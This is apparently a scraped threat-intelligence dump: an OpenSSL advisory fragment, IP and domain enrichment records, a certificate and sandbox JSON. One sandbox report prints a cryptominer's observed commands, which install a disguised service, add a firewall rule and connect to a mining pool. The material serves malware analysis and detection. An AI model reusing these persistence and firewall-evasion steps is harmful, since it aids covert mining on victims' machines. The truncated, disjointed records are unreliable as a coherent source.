Fixed in OpenSSL 1.0.0k (Affected 1.0.0j, 1.0.0i, 1.0.0g, 1.0.0f, 1.0.0e, 1.0.0d, 1.0.0c, 1.0.0b, 1.0.0a, 1.0.0) Fixed in OpenSSL 0.9.8y (Affected 0.9.8x, 0.9.8w, 0.9.8v, 0.9.8u, 0.9.8t, 0.9.8s, 0.9.8r, 0.9.8q, 0.9.8p, 0.9.8o, 0.9.8n, 0.9.8m, 0.9.8l, 0.9.8k, 0.9.8j, 0.9.8i, 0.9.8h, 0.9.8g, 0.9.8f, 0.9.8d, 0.9.8c, 0.9.8b, 0.9.8a, 0.9.8) Affected users should upgrade to OpenSSL 1.0.1e, 1.0.0k or 0.9.8y (The fix in 1.0.1d wasn't complete, so please use 1.0.1e or later) 188.114.96.9 2022-12-18 00:16:46 Co-Hosted Site No ThreatMiner 0 0 2 0 None d68f9904-2e3d-4090-854b-ff8a0a1bfcdf.id.repl.co 34.149.204.188 2022-12-18 00:07:04 Raw Data from RIRs No Hybrid Analysis 0 0 2 0 None {u'count': 4, u'search_terms': [{u'id': u'host', u'value': u'81.88.52.232'}], u'result': [{u'environment_id': 100, u'job_id': u'62da0341155b644cbf25ee8a', u'analysis_start_time': u'2022-07-22 01:54:10', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'ed869700692422a45f2148051ae0facf769fa849fedd48e2677d9309eb7887dd', u'type': None, u'type_short': u'url', u'size': 61}, {u'environment_id': 100, u'job_id': u'6269600634b274176c687406', u'analysis_start_time': u'2022-04-27 15:23:54', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': 70, u'verdict': u'suspicious', u'submit_name': u'sample.url', u'sha256': u'cbc559c051211a3c2705c3c596c72bd474794b641af2edb475537f28daaa3a9d', u'type': None, u'type_short': u'url', u'size': 44}, {u'environment_id': 100, u'job_id': u'6244827f3100683457311fa8', u'analysis_start_time': u'2022-03-30 16:17:10', u'vx_family': u'Malware site', u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': 77, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'e7b7b6a0a4b989cb9835d10b4d7ab47c93a8163a9fbeed5a7db9d0568942f99a', u'type': None, u'type_short': u'url', u'size': 50}, {u'environment_id': 120, u'job_id': u'62053dddc78deb50351e9b07', u'analysis_start_time': u'2022-02-10 16:31:30', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 64 bit', u'threat_score': 77, u'verdict': u'suspicious', u'submit_name': u'sample.url', u'sha256': u'56a636800d3684f91fbe334333b8bff47eb09fd955e1eb29dd558368145e934a', u'type': None, u'type_short': u'url', u'size': 49}]} 81.88.52.232 2022-12-18 00:12:19 Raw Data from RIRs No Hybrid Analysis 0 0 2 0 None [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': None, u'total_processes': 15, u'threat_score': 35, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'http://188.114.96.3/', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"188.114.96.3:80"\n "104.18.30.78:443"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "Part-RU" as clean (type is "DOS executable (COM)")'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:7844:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ChromeProcessSingletonStartup!"\n "Local\\SM0:5972:304:WilStaging_02"\n "Local\\InternetShortcutMutex"\n "Local\\SM0:5972:120:WilError_01"\n "Local\\SM0:7844:304:WilStaging_02"\n "Local\\SM0:7844:120:WilError_01"\n "Local\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:7844:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:7704:304:WilStaging_02"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-33', u'name': u'Drops executable files inside temp directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"Part-RU" has type "DOS executable (COM)"- Location: [%TEMP%\\7844_1747259734\\Part-RU]- [targetUID: 00000000-00007844]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Asset Store\\assets.db\\000003.log]- [targetUID: 00000000-00007844]\n "Part-ES" has type "data"- Location: [%TEMP%\\7844_1747259734\\Part-ES]- [targetUID: 00000000-00007844]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00007844]\n "1a8f52a0-4099-4402-b391-421fc08473ee.tmp" has type "ASCII text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Network\\1a8f52a0-4099-4402-b391-421fc08473ee.tmp]- [targetUID: 00000000-00006860]\n "4e33750c-68a3-4112-95eb-4d1abbad7b2e.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\4e33750c-68a3-4112-95eb-4d1abbad7b2e.tmp]- [targetUID: 00000000-00007844]\n "3ea8b6c1-ec31-4428-9eac-f50edddf6fec.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\3ea8b6c1-ec31-4428-9eac-f50edddf6fec.tmp]- [targetUID: 00000000-00007844]\n "settings.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Crashpad\\settings.dat]- [targetUID: 00000000-00007660]\n "manifest.json" has type "JSON data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\OriginTrials\\0.0.1.4\\manifest.json]- [targetUID: 00000000-00007844]\n "a3302238-aeb2-4870-bfa5-e04961c56c63.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\a3302238-aeb2-4870-bfa5-e04961c56c63.tmp]- [targetUID: 00000000-00007844]\n "Last Browser" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Last Browser]- [targetUID: 00000000-00007844]\n "cffaa58e-e034-4193-ac55-7175f0cedd28.tmp" has type "very short file (no magic)"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\cffaa58e-e034-4193-ac55-7175f0cedd28.tmp]- [targetUID: 00000000-00007844]\n "870b1947-b37b-41dc-a12d-92436625da90.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\870b1947-b37b-41dc-a12d-92436625da90.tmp]- [targetUID: 00000000-00007844]\n "temp-index" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\index-dir\\temp-index]- [targetUID: 00000000-00007844]\n "shopping_iframe_driver.js" has type "ASCII text with very long lines with CRLF line terminators"- Location: [%TEMP%\\7844_1603751462\\shopping_iframe_driver.js]- [targetUID: 00000000-00007844]\n "manifest.fingerprint" has type "ASCII text with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\OriginTrials\\0.0.1.4\\manifest.fingerprint]- [targetUID: 00000000-00007844]\n "7f7f3eea-ccb8-495f-8e9f-46a493f00f9b.tmp" has type "JSON data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Ad Blocking\\7f7f3eea-ccb8-495f-8e9f-46a493f00f9b.tmp]- [targetUID: 00000000-00007844]\n "LOG" has type "ASCII text"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Service Worker\\Database\\LOG]- [targetUID: 00000000-00007844]\n "Part-FR" has type "data"- Location: [%TEMP%\\7844_1747259734\\Part-FR]- [targetUID: 00000000-00007844]'}, {u'category': u'Network Related', u'origin': u'String', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "http://188.114.96.3/"\n Pattern match: "http://188.114.96.3"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-35', u'name': u'Drops script files inside temp directory', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 1, u'type': 8, u'description': u'Dropped file: "shopping_iframe_driver.js" - Location: [%TEMP%\\7844_1603751462\\shopping_iframe_driver.js]- [targetUID: 00000000-00007844]\n Dropped file: "shopping.js" - Location: [%TEMP%\\7844_1603751462\\shopping.js]- [targetUID: 00000000-00007844]\n Dropped file: "edge_confirmation_page_validator.js" - Location: [%TEMP%\\7844_1603751462\\edge_confirmation_page_validator.js]- [targetUID: 00000000-00007844]\n Dropped file: "edge_checkout_page_validator.js" - Location: [%TEMP%\\7844_1603751462\\edge_checkout_page_validator.js]- [targetUID: 00000000-00007844]\n Dropped file: "adblock_snippet.js" - Location: [%TEMP%\\7844_1747259734\\adblock_snippet.js]- [targetUID: 00000000-00007844]\n Dropped file: "shoppingfre.js" - Location: [%TEMP%\\7844_1603751462\\shoppingfre.js]- [targetUID: 00000000-00007844]\n Dropped file: "edge_tracking_page_validator.js" - Location: [%TEMP%\\7844_1603751462\\edge_tracking_page_validator.js]- [targetUID: 00000000-00007844]\n Dropped file: "product_page.js" - Location: [%TEMP%\\7844_1603751462\\product_page.js]- [targetUID: 00000000-00007844]\n Dropped file: "edge_driver.js" - Location: [%TEMP%\\7844_1603751462\\edge_driver.js]- [targetUID: 00000000-00007844]\n Dropped file: "auto_open_controller.js" - Location: [%TEMP%\\7844_1603751462\\auto_open_controller.js]- [targetUID: 00000000-00007844]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-1', u'name': u'Drops executable files', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 1, u'type': 8, u'description': u'"Part-RU" has type "DOS executable (COM)"- Location: [%TEMP%\\7844_1747259734\\Part-RU]- [targetUID: 00000000-00007844]'}, {u'category': u'Spyware/Information Retrieval', u'origin': u'String', u'identifier': u'string-93', u'name': u'Found browser information locations related strings', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1005', u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': u'T1005', u'relevance': 5, u'threat_level': 1, u'type': 2, u'description': u'"C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\Crashpad\\reports" (Indicator: "microsoft\\edge\\user data") in Source: 00000000-00007844-00000BE4-912947994\n "C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\OptimizationGuidePredictionModels" (Indicator: "microsoft\\edge\\user data") in Source: 00000000-00007844-00000BE4-11179608308\n "C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\EdgePushStorageWithConnectTokens" (Indicator: "microsoft\\edge\\user data") in Source: 00000000-00007844-00000BE4-11670863117\n "C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\blob_storage\\194cca25-e317-474b-be1e-a7c27f1695b6" (Indicator: "microsoft\\edge\\user data") in Source: 00000000-00007844-00000BE4-26668708152\n "C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\blob_storage\\d0313995-11ad-4fbc-ac47-fb134ed2e3e0" (Indicator: "microsoft\\edge\\user data") in Source: 00000000-00007844-00000BE6-26681438356\n "C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\Subresource Filter\\Indexed Rules\\35\\scoped_dir7844_1486529118" (Indicator: "microsoft\\edge\\user data") in Source: 00000000-00007844-00000BE4-326216024507\n "C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\Subresource Filter\\Unindexed Rules\\10.34.0.28\\LICENSE" (Indicator: "microsoft\\edge\\user data") in Source: 00000000-00007844-00000 188.114.96.3 2022-12-18 00:16:46 Co-Hosted Site No ThreatMiner 0 0 2 0 None new.friendsquito.repl.co 34.149.204.188 2022-12-18 00:08:38 BGP AS Membership No RIPE 0 0 3 0 None 13335 172.67.144.0/20 2022-12-18 00:16:27 SSL Certificate - Raw Data No SSL Certificate Analyzer 0 0 2 0 None Certificate: Data: Version: 3 (0x2) Serial Number: 09:6b:82:e9:73:99:94:ba:fd:55:b0:21:db:c7:c8:bf Signature Algorithm: ecdsa-with-SHA256 Issuer: C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3 Validity Not Before: Aug 3 00:00:00 2022 GMT Not After : Aug 2 23:59:59 2023 GMT Subject: C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com Subject Public Key Info: Public Key Algorithm: id-ecPublicKey Public-Key: (256 bit) pub: 04:76:16:8f:f9:e3:b6:aa:dc:0b:91:40:d8:f1:ee: e8:7f:8e:97:0e:7d:bd:b0:c5:93:63:66:fa:7b:4f: 17:a1:09:ff:20:68:33:a3:45:37:1f:e8:4b:eb:77: 53:b6:57:60:ef:a1:af:f1:36:97:26:c7:fa:95:e9: 9a:ab:1a:dd:7d ASN1 OID: prime256v1 NIST CURVE: P-256 X509v3 extensions: X509v3 Authority Key Identifier: keyid:A5:CE:37:EA:EB:B0:75:0E:94:67:88:B4:45:FA:D9:24:10:87:96:1F X509v3 Subject Key Identifier: 18:B9:52:2C:13:17:3E:3A:39:88:53:5C:BD:9C:BE:05:0B:02:25:90 X509v3 Subject Alternative Name: DNS:cdnjs.cloudflare.com, DNS:*.cdnjs.cloudflare.com, DNS:sni.cloudflaressl.com X509v3 Key Usage: critical Digital Signature X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 CRL Distribution Points: Full Name: URI:http://crl3.digicert.com/CloudflareIncECCCA-3.crl Full Name: URI:http://crl4.digicert.com/CloudflareIncECCCA-3.crl X509v3 Certificate Policies: Policy: 2.23.140.1.2.2 CPS: http://www.digicert.com/CPS Authority Information Access: OCSP - URI:http://ocsp.digicert.com CA Issuers - URI:http://cacerts.digicert.com/CloudflareIncECCCA-3.crt X509v3 Basic Constraints: critical CA:FALSE CT Precertificate SCTs: Signed Certificate Timestamp: Version : v1 (0x0) Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9: 03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E Timestamp : Aug 3 19:12:00.178 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:44:02:20:35:9E:7D:1C:03:B8:4A:87:C0:13:01:D5: 28:AD:64:70:5B:10:FC:72:88:58:48:7A:E3:4C:D5:27: DB:76:00:22:02:20:12:E0:E2:34:44:22:24:C1:E5:7A: 25:12:AD:9E:F8:88:A1:A0:65:AF:1A:76:C9:03:41:4F: 8A:70:C8:E6:BA:DA Signed Certificate Timestamp: Version : v1 (0x0) Log ID : 35:CF:19:1B:BF:B1:6C:57:BF:0F:AD:4C:6D:42:CB:BB: B6:27:20:26:51:EA:3F:E1:2A:EF:A8:03:C3:3B:D6:4C Timestamp : Aug 3 19:12:00.017 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:46:02:21:00:EE:6E:D3:CF:4A:8A:13:16:AB:6B:C2: F7:32:B6:2A:5B:13:45:7A:44:ED:3B:86:8B:85:F4:94: BA:E0:8C:12:60:02:21:00:8C:46:CA:E7:C6:A7:69:C8: 22:62:61:BA:E1:29:8F:BC:3C:BF:F4:A2:81:44:80:DA: F5:C9:B6:E6:AF:CD:A6:FB Signed Certificate Timestamp: Version : v1 (0x0) Log ID : B3:73:77:07:E1:84:50:F8:63:86:D6:05:A9:DC:11:09: 4A:79:2D:B1:67:0C:0B:87:DC:F0:03:0E:79:36:A5:9A Timestamp : Aug 3 19:12:00.038 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:46:02:21:00:E5:0C:F6:4E:3C:40:01:1A:EC:D8:91: 2D:69:6A:1C:FF:4F:75:55:8C:D7:D2:38:86:36:36:FA: EE:4F:65:29:FC:02:21:00:9F:BC:3F:8A:93:C7:A2:ED: F5:94:99:85:01:90:F2:60:36:3B:2E:03:0E:E0:46:5E: 8C:3E:16:39:2B:64:D1:78 Signature Algorithm: ecdsa-with-SHA256 30:45:02:21:00:d8:35:e0:5c:fe:c9:39:b4:06:5a:95:36:1c: 73:f4:85:1c:c5:6e:6b:ef:48:76:d6:7f:a3:fe:55:ed:82:7f: c5:02:20:7f:8c:86:3a:6f:04:3e:0d:d7:cc:87:51:a8:0d:5c: ce:bc:93:88:aa:35:4a:5c:02:bb:47:5c:7c:87:7b:21:de 188.114.97.3 2022-12-18 00:19:16 Raw Data from RIRs No Hybrid Analysis 0 0 3 0 None [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': None, u'total_processes': 0, u'threat_score': None, u'compromised_hosts': [], u'environment_id': None, u'major_os_version': None, u'submit_name': u'file', u'signatures': [], u'threat_level': 2, u'size': 12074496, u'job_id': None, u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [], u'certificates': [], u'hosts': [], u'sha256': u'4623e1ce31a8671e59640e83fc545a5f19e167c31cfc6e8d097864c7a4c27859', u'sha512': u'2f6b245abefc8a6be75c163474f1b0d088382776fcc5db174c088a377aa956d93a701ccefcf7223936350989a4f3b589e1a49d0eca5fb6eac76001c116f9fa10', u'image_file_characteristics': [], u'submissions': [{u'url': None, u'submission_id': u'60acfbefb300bf7e665fadf4', u'created_at': u'2021-05-25T13:30:23+00:00', u'filename': u'file'}], u'analysis_start_time': u'2021-05-25T13:30:23+00:00', u'tags': [], u'imphash': None, u'total_network_connections': 0, u'av_detect': 87, u'machine_learning_models': [], u'total_signatures': 0, u'image_base': None, u'error_origin': None, u'ssdeep': None, u'entrypoint_section': None, u'md5': u'190ae55de09b24c97c55def9ae4d1122', u'network_mode': u'default', u'processes': [], u'sha1': u'f66c17bc3bed94dd163114c84d855e11a8b97a6a', u'url_analysis': False, u'type': u'PE32 executable (GUI) Intel 80386, for MS Windows', u'file_metadata': None, u'dll_characteristics': [], u'vx_family': u'Trojan.Mint.Zamg', u'environment_description': u'Static Analysis', u'verdict': u'malicious', u'minor_os_version': None, u'domains': [], u'extracted_files': [], u'type_short': [u'peexe', u'executable']}, {u'subsystem': None, u'classification_tags': [u'miner'], u'crowdstrike_ai': None, u'total_processes': 10, u'threat_score': 100, u'compromised_hosts': [u'43.231.4.7', u'94.23.27.38', u'69.168.106.65', u'213.33.98.149', u'185.65.202.47', u'209.85.200.27', u'144.160.159.22', u'72.167.238.29', u'170.146.221.13', u'74.208.5.20', u'184.171.128.11', u'69.168.106.33', u'68.87.20.5', u'207.69.189.231', u'98.137.157.43', u'208.180.40.132', u'65.20.0.49'], u'environment_id': 120, u'major_os_version': None, u'submit_name': u'4623e1ce31a8671e59640e83fc545a5f19e167c31cfc6e8d097864c7a4c27859.exe', u'signatures': [{u'category': u'General', u'origin': u'API Call', u'identifier': u'api-4', u'name': u'Creates a writable file in a temporary directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'".exe" created file "%TEMP%\\auwtnjty.exe"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\RasPbFile"\n "\\Sessions\\1\\BaseNamedObjects\\Global\\3a886eb8-fe40-4d0a-b78b-9e0bcb683fb7"'}, {u'category': u'General', u'origin': u'Registry Access', u'identifier': u'registry-17', u'name': u'Accesses System Certificates Settings', u'attck_id_wiki': u'https://attack.mitre.org/wiki/Technique/T1112', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1112', u'relevance': 10, u'threat_level': 0, u'type': 3, u'description': u'"svchost.exe" (Path: "HKU\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\MY"; Key: "")'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-25', u'name': u'Spawns new processes', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 9, u'description': u'Spawned process "cmd.exe" with commandline "/C mkdir %WINDIR%\\SysWOW64\\ogiqgahj\\" (UID: 00021650-00002144)\n Spawned process "cmd.exe" with commandline "/C move /Y "%TEMP%\\auwtnjty.exe" %WINDIR%\\SysWOW64\\ogiqgahj\\" (UID: 00021708-00002924)\n Spawned process "sc.exe" with commandline "create ogiqgahj binPath= "%WINDIR%\\SysWOW64\\ogiqgahj\\auwtnjty.ex ..." (UID: 00021766-00001768), Spawned process "sc.exe" with commandline "description ogiqgahj "wifi internet conection"" (UID: 00021802-00003812), Spawned process "sc.exe" with commandline "start ogiqgahj" (UID: 00021837-00001656), Spawned process "auwtnjty.exe" with commandline "/d"C:\\4623e1ce31a8671e59640e83fc545a5f19e167c31cfc6e8d097864c7a4 ..." (UID: 00021867-00003764)\n Spawned process "netsh.exe" with commandline "advfirewall firewall add rule name="Host-process for services of ..." (UID: 00021872-00002388), Spawned process "svchost.exe" (UID: 00022025-00002608), Spawned process "svchost.exe" with commandline "-a cryptonight-heavy --variant tube -o stratum+tcp://185.65.202. ..." (UID: 00023938-00003132)'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-3', u'name': u'Runs shell commands', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 9, u'description': u'"/C mkdir %WINDIR%\\SysWOW64\\ogiqgahj\\" on 2019-5-13.11:42:41.985\n "/C move /Y "%TEMP%\\auwtnjty.exe" %WINDIR%\\SysWOW64\\ogiqgahj\\" on 2019-5-13.11:42:42.876'}, {u'category': u'General', u'origin': u'Registry Access', u'identifier': u'registry-72', u'name': u'Overview of unique CLSIDs touched in registry', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 3, u'description': u'".exe" touched "Security Manager" (Path: "HKCU\\WOW6432NODE\\CLSID\\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}")\n ".exe" touched "Computer" (Path: "HKCU\\WOW6432NODE\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER")\n ".exe" touched "Network" (Path: "HKCU\\WOW6432NODE\\CLSID\\{208D2C60-3AEA-1069-A2D7-08002B30309D}\\SHELLFOLDER")\n ".exe" touched "Recycle Bin" (Path: "HKCU\\WOW6432NODE\\CLSID\\{645FF040-5081-101B-9F08-00AA002F954E}\\SHELLFOLDER")\n ".exe" touched "Control Panel" (Path: "HKCU\\WOW6432NODE\\CLSID\\{26EE0668-A00A-44D7-9371-BEB064C98683}\\SHELLFOLDER")\n ".exe" touched "UsersFiles" (Path: "HKCU\\WOW6432NODE\\CLSID\\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\\SHELLFOLDER")\n ".exe" touched "UsersLibraries" (Path: "HKCU\\WOW6432NODE\\CLSID\\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\\SHELLFOLDER")\n ".exe" touched "CLSID_SearchFolder" (Path: "HKCU\\WOW6432NODE\\CLSID\\{04731B67-D933-450A-90E6-4ACD2E9408FE}\\SHELLFOLDER")\n ".exe" touched "IE History and Feeds Shell Data Source for Windows Search" (Path: "HKCU\\WOW6432NODE\\CLSID\\{11016101-E366-4D22-BC06-4ADA335C892B}\\SHELLFOLDER")\n ".exe" touched "Public Folder" (Path: "HKCU\\WOW6432NODE\\CLSID\\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\\SHELLFOLDER")\n ".exe" touched "Control Panel command object for Start menu and desktop" (Path: "HKCU\\WOW6432NODE\\CLSID\\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\\SHELLFOLDER")\n ".exe" touched "@%systemroot%\\system32\\mssvp.dll,-110" (Path: "HKCU\\WOW6432NODE\\CLSID\\{89D83576-6BD1-4C86-9454-BEB04E94C819}\\SHELLFOLDER")\n ".exe" touched "CLSID_SearchHome" (Path: "HKCU\\WOW6432NODE\\CLSID\\{9343812E-1C37-4A49-A12E-4B2D810D956B}\\SHELLFOLDER")\n ".exe" touched "Other Users Folder" (Path: "HKCU\\WOW6432NODE\\CLSID\\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\\SHELLFOLDER")\n ".exe" touched "@%systemroot%\\system32\\mssvp.dll,-112" (Path: "HKCU\\WOW6432NODE\\CLSID\\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\\SHELLFOLDER")\n ".exe" touched "CLSID_StartMenuProviderFolder" (Path: "HKCU\\WOW6432NODE\\CLSID\\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\\SHELLFOLDER")\n ".exe" touched "CLSID_StartMenuPathCompleteProviderFolder" (Path: "HKCU\\WOW6432NODE\\CLSID\\{E345F35F-9397-435C-8F95-4E922C26259E}\\SHELLFOLDER")\n ".exe" touched "Games Explorer" (Path: "HKCU\\WOW6432NODE\\CLSID\\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\\SHELLFOLDER")\n ".exe" touched "Computers and Devices" (Path: "HKCU\\WOW6432NODE\\CLSID\\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\\SHELLFOLDER")\n ".exe" touched "Memory Mapped Cache Mgr" (Path: "HKCU\\WOW6432NODE\\CLSID\\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\\TREATAS")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"43.231.4.7:443"\n "94.23.27.38:480"\n "219.87.84.65:25"\n "69.168.106.65:25"\n "213.33.98.149:25"\n "209.143.0.195:25"\n "185.65.202.47:8087"\n "209.85.200.27:25"\n "144.160.159.22:25"\n "72.167.238.29:25"\n "170.146.221.13:25"\n "74.208.5.20:25"\n "184.171.128.11:25"\n "69.168.106.33:25"\n "185.37.226.254:25"\n "68.87.20.5:25"\n "207.69.189.231:25"\n "98.137.157.43:25"\n "208.180.40.132:25"\n "65.20.0.49:25"'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-67', u'name': u'Process launched with changed environment', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 9, u'description': u'Process "auwtnjty.exe" (UID: 00021867-00003764) was launched with modified environment variables: "CommonProgramFiles, Path, LOCALAPPDATA, USERDOMAIN, PROCESSOR_ARCHITECTURE, TEMP, APPDATA, USERPROFILE, TMP, ProgramFiles, USERNAME"\n Process "auwtnjty.exe" (UID: 00021867-00003764) was launched with missing environment variables: "PROCESSOR_ARCHITEW6432, LOGONSERVER, PROMPT, VXDIR, HOMEPATH, HOMEDRIVE"\n Process "svchost.exe" (UID: 00022025-00002608) was launched with new environment variables: "PROCESSOR 81.88.48.101 2022-12-18 00:31:50 Open TCP Port No Pulsedive 0 0 4 0 None 195.110.124.133:443 195.110.124.0/24 2022-12-18 00:04:11 Co-Hosted Site No SSL Certificate Analyzer 0 0 2 0 None cdnjs.cloudflare.com 188.114.97.0 2022-12-18 00:21:09 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Server: cloudflare Date: Content-Type: text/html Content-Length: 151 Connection: keep-alive CF-RAY: 77b25d2e9a19226e-ORD 188.114.96.0 2022-12-18 00:19:08 Physical Location No ipapi.co 0 0 3 0 None Florence, Tuscany, 52, Italy, IT 81.88.48.102 2022-12-18 00:16:53 Affiliate - Company Name No Company Name Extractor 0 0 4 0 None 